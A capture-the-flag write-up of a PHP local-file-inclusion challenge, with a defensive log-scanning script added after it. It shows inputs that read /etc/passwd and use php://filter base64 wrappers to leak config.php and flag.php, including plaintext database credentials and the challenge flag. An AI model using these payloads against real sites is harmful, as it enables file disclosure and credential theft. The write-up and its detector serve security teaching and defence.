AUCHALL - [Web] - Intro
Challenge Description
The Introductions have to be really easy, no?
Solution
On opening the challenge, we were given an input.
If we give /etc/passwd as input, we get its contents back, which shows that the application is using some sort of include() function to load the file.
Typically, PHP applications use a config.php file to store database credentials.
Let's check config.php.
We got no output, because include() executes config.php as PHP instead of printing its source. This means we need to use a PHP filter to convert the output into base64:
php://filter/convert.base64-encode/resource=config.php
On decoding the base64 output, we got the database credentials:
<?php
$host = "127.0.0.1";
$user = "the_user";
$pass = "%as21k.amu2SAVS51";
$db = "cy243l";
/*
In a recent scan, I found out that the db user and the machine user had exact same usernames and passwords.
Do ping me once you've changed it.
*/
?>
But wait, we need the flag. Where is the flag?
I tried checking for flag.php:
php://filter/convert.base64-encode/resource=flag.php
Flag
The flag is dynamic:
CY243L{b4s1c_lf1_f1lt3r_r3ad_eb8c9DD_eUcS_wIHW}
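The requests in this walkthrough leave a recognizable trace in web server logs. As an added example (not part of the original writeup or the challenge's code), the Python below scans access-log lines for parameter values that are absolute paths or stream wrappers such as php://filter; the log lines, the `page` parameter name and the `/index.php` path are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote

# Constructed access-log lines (assumed format, parameter name and path).
# The submitted values are the ones used in the writeup; the last is percent-encoded.
SAMPLE_LOG = """\
203.0.113.7 - - [01/Jan/2023:10:00:01 +0000] "GET /index.php?page=home HTTP/1.1" 200 812
203.0.113.7 - - [01/Jan/2023:10:00:09 +0000] "GET /index.php?page=/etc/passwd HTTP/1.1" 200 1534
203.0.113.7 - - [01/Jan/2023:10:00:20 +0000] "GET /index.php?page=config.php HTTP/1.1" 200 0
203.0.113.7 - - [01/Jan/2023:10:00:31 +0000] "GET /index.php?page=php://filter/convert.base64-encode/resource=config.php HTTP/1.1" 200 420
203.0.113.7 - - [01/Jan/2023:10:00:40 +0000] "GET /index.php?page=php%3A%2F%2Ffilter%2Fconvert.base64-encode%2Fresource%3Dflag.php HTTP/1.1" 200 96
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) (?P<size>\d+)')
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.\-]*://", re.I)

def classify(value):
    """Return a finding label for one parameter value, or None if it looks benign."""
    # An extra decode pass catches values that were percent-encoded twice.
    value = unquote(value)
    if value.lower().startswith("php://filter"):
        return "php-filter-wrapper"
    if SCHEME_RE.match(value):
        return "stream-wrapper"
    if value.startswith("/"):
        return "absolute-path"
    return None

def scan(log_text):
    """Return (parameter, decoded value, label, response size) per suspicious request."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        query = m.group("target").partition("?")[2]
        # parse_qsl splits on the first '=' only, so 'resource=...' stays in the value.
        for name, value in parse_qsl(query, keep_blank_values=True):
            label = classify(value)
            if label:
                findings.append((name, value, label, int(m.group("size"))))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The plain `config.php` request is not flagged, so log signatures like these complement, rather than replace, restricting include() to a fixed allowlist of files in the application.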
Writeups 2023 © RootxRAN.